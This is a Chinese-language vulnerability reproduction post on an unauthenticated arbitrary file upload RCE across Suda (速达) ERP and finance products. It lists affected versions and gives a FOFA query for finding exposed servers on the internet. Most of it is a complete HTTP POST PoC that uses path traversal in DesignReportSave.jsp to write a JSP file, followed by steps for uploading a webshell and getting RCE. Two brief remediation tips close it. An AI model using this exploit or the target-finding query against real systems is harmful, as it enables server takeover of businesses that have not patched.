速达软件全系产品 RCE漏洞复现
0x01 产品简介
速达软件是中小企业管理软件第一品牌和行业领导者,是128万家企业用户忠实的选择。14年来速达致力于进销存软件、ERP软件、财务软件、CRM软件等管理软件的研发和服务。
0x02 漏洞概述
速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷
0x03 影响范围
速达A3.cloud BAS
速达A3.cloud STD
速达A30.cloud PRO
速达3000.online PRO
速达A4.cloud BAS
速达A4.cloud STD
速达A40.cloud PRO
速达4000.online PRO
速达A5.cloud STD
速达A50.cloud PRO
速达A70.cloud PRO
速达5000.online PRO
速达7000.online PRO
0x04 复现环境
FOFA:app="速达软件-公司产品"
0x05 漏洞复现
PoC
POST /report/DesignReportSave.jsp?report=../文件名 HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Type: application/octet-stream
Connection: close
<% out.print("test");%>
验证
上传马子
RCE
0x06 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本